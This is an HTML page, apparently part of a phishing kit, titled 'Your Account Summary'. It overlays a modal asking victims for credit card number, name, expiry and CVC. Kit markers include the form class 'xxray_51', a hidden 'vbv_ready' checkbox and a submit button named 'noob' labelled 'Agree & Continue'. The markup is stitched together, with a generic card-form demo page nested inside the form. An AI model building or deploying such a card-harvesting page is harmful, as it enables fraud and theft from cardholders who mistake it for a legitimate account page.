<html>

<style type="text/css">
    .check_box{
        background-image: url("css/onboarding_form.png");
        background-repeat: no-repeat;
        padding-left: 28px;
        line-height: 26px;
        display: inline-block;
        margin-bottom: 9px;
        cursor: pointer;
    }
    #checked{
        background-position: 0px -100px;
    }
    #inchecked{
        background-position: 0px 0px;
    }
.inp{
        width: 358px;
        height: 40px;
        padding-left: 12px;
        margin-bottom: 18px;
        border: 1px solid #B7B6B6;
        border-radius: 3px;
        font-size: 16px;
        text-transform: capitalize;
} 
 .card{
        display: inline-block;
        background-image: url("css/sprites_cc_global.png");
        background-repeat: no-repeat;
        background-position: 0px -406px;
        height: 30px;
        position: relative;
        left: 124px;
        bottom: -15px;
        width: 40px;
         }
    .date{
    display: inline-block;
    background-image: url("css/sprites_cc_global.png");
    background-repeat: no-repeat;
    background-position: 0px -434px;
    height: 28px;
    position: relative;
    left: -72px;
    bottom: -9px;
    width: 40px;
    }
.in{
        font-family: arial, Helvetica, sans-serif;
    font-size: 10pt;
    color: #333;
    font-weight: normal;
    padding-top: 12px;
    padding-bottom: 12px;
    border-radius: 4px;
    border: 1px solid #CCC;
    margin: 5px;
    float: left;
}
  </style><meta charset="UTF-8">
  
    <title>Your Account Summary</title>
    <link rel="stylesheet" href="#">
    <link rel="stylesheet" href="#">
		<link rel="shortcut icon" type="image/x-icon" href="images/favicon.ico" />
</head>

<body>
<div class="wrapper">

</div>
	
	<div tabindex="-1" role="dialog" aria-labelledby="login-modal-label" aria-hidden="false" style="display: ;      overflow: hidden;      position: fixed;      top: 0;      right: 0;      bottom: 0;      left: 0;      z-index: 1040;      -webkit-overflow-scrolling: touch;      outline: 0;display: block;"><div style="background-color:#000000;position: fixed;      top: 0;      right: 0;      bottom: 0;      left: 0;      z-index: 1040;opacity: 0.5;      filter: alpha(opacity=50);height: 792px;"></div>
    <div style="
    width: auto;
    margin: 10px;
    z-index: 100000;
">
       <div style="
    z-index: 100011;

       width: auto;
margin: auto;
    padding: 17px;
    width: 802px;
    position: relative;
    background-color: #ffffff;
    border: 1px solid #999999;
    border: 1px solid rgba(0,0,0,0.2);
    border-radius: 6px;
    -webkit-box-shadow: 0 3px 9px rgba(0,0,0,0.5);
    box-shadow: 0 3px 9px rgba(0,0,0,0.5);
    -webkit-background-clip: padding-box;
    background-clip: padding-box;
    outline: 0;

    border-color: #e5e5e5 #d9d9d9 #cccccc;
    -webkit-box-shadow: 0 3px 15px rgba(148, 148, 148, 0.8);
    box-shadow: 0 3px 15px rgba(148, 148, 148, 0.8);
    -webkit-border-radius: 10px;
    -moz-border-radius: 10px;
    border-radius: 10px;
    -moz-background-clip: padding-box;
    -webkit-background-clip: padding-box;
    background-clip: padding-box;
    outline: 0 none;
    margin-top: 139px;

">
<form class="xxray_51" method="post" action="" style="
">
  <h3 style="
    font-family: Arial, Helvetica, sans-serif;
    font-size: 18px;
    font-weight: normal;
    color: #666;
	">
	<h2 style="
    font-family: Arial, Helvetica, sans-serif;
    font-size: 29pt;
    font-weight: normal;
    color: #666;
     ">Credit Card Information</h2>
         <br>
<html>
<head>
    <title>Card &ndash; the better way to collect credit cards</title>
    <meta name="viewport" content="initial-scale=1">
</head>
<body>
    <style>
        .demo-container {
            width: 100%;
            max-width: 350px;
            margin: 80px auto;
        }

        form {
            margin: 30px;
        }
        input {
            width: 200px;
            margin: 10px auto;
            display: block;
        }

    </style><div class="demo-container">
        <div class="card-wrapper"></div>

        <div class="form-container active">
            <form action="">
                <input placeholder="Card number" type="text" name="number">
                <input placeholder="Full name" type="text" name="name">
                <input placeholder="MM/YY" type="text" name="expiry">
                <input placeholder="CVC" type="text" name="cvc">
            </form>
        </div>
    </div>
	<script src="card.js"></script>
    <script>
        new Card({
            form: document.querySelector('form'),
            container: '.card-wrapper'
        });
    </script>
	</body>
</html>
<!-- END FORM --><br>
	                       <input type="checkbox" hidden="hidden" id="checkbox" name="vbv_ready">
		
        <input class="inpclassicsumblit2" name="noob" type="submit" style="width: 600px;padding: 15px;      border-radius: 5px;      border: 0px solid #CCC;      width: 600px;      margin-top: 9px;      background-color: #0099cc;      font-family: Arial, Helvetica, sans-serif;      font-weight: bold;      color: #FFF;      font-size: 16px;" value="Agree &amp; Continue" id="valider">
<br>
        </div>
                
            </div>
        </div>
</body>
</html>